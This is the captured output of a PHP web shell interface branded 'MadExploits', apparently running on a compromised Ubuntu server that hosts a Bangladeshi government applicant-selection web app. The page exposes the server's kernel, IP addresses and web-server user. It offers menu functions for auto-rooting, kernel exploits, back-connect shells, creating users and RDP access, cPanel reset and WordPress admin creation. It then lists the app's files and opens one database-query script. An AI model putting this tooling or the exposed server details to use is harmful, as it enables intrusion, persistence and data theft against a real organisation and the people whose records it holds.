Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.221.79.157
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
applicantselection /
[ HOME SHELL ]
Name
Size
Permission
Action
111ajaxview.php
1.24
KB
-rw-r--r--
222report_indproduct_sale.php
4.05
KB
-rw-r--r--
ajaxapplicant.php
4.72
KB
-rw-r--r--
ajaxselection.php
2.88
KB
-rw-r--r--
applicant_callingpage.php
419
B
-rw-r--r--
applicant_editor.php
5.83
KB
-rw-r--r--
applicantselection.php
3.7
KB
-rw-r--r--
applicantselection_editor.php
2.9
KB
-rw-r--r--
applicantselection_list.php
6.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajaxselection.php
<?php session_start(); include("../common/config.php"); include("../common/functions.php"); $trevent_id= $_REQUEST["q"]; ?> <table class="table table-bordered table-striped table-condensed"> <tr> <td><span class="glyphicon glyphicon-ok"></span></td> <td><b>ব্যাচ আইডি</b></td> <td><b>PIMS আইডি</b></td> <td><b>নাম</b></td> <td><b>পদবি</b></td> <td><b>কর্মস্থল</b></td> </tr> <tbody> <?php $stmt = $conn->prepare("SELECT ap.id, ap.GovtId, ap.trevent_id, ap.district_id, ap.apname, ap.designation_id, ap.office_id, ap.address, ap.mobileno, ap.email, ap.comment, ap.nidcard, tr.subject, tr.trevnID, d.DesignationName, o.OfficeName, dis.DistrictName FROM applicantlist ap LEFT JOIN trevent tr ON(ap.trevent_id=tr.id) LEFT JOIN designation d ON(ap.designation_id=d.id) LEFT JOIN office o ON (ap.office_id=o.id) LEFT JOIN district dis ON (ap.district_id=dis.id) LEFT JOIN applicantselection aps ON (aps.applicantlist_id=ap.id) WHERE ap.trevent_id=?"); $stmt->bind_param("i",$trevent_id); $stmt->execute(); $slno=0; //Result $result = $stmt->get_result(); $numrows=$result->num_rows; if($numrows==0) exit("No rows"); $slno=0; while($row = $result->fetch_assoc()) { $id = $row["id"]; $trevent_id = $row["trevent_id"]; $trevnID = $row["trevnID"]; $GovtId = $row["GovtId"]; $apname = $row["apname"]; $DesignationName = $row["DesignationName"]; $OfficeName = $row["OfficeName"]; ?> <tr> <td> <input type="checkbox" name="slflag<?=$id?>" id="slflag<?=$id?>" value="1" <?php if($row["slflag"]==1){echo "checked";}?>> </td> <td> <?=bangladate($trevnID)?> <input type="hidden" name="applicantlist_id<?=$id?>" id="applicantlist_id<?=$id?>" value="<?=$id?>" > </td> <td><?=bangladate($GovtId) ?></td> <td><?=$apname ?></td> <td><?=$DesignationName ?></td> <td><?=$OfficeName ?></td> </tr> <?php } ?> </tbody> </table>
Close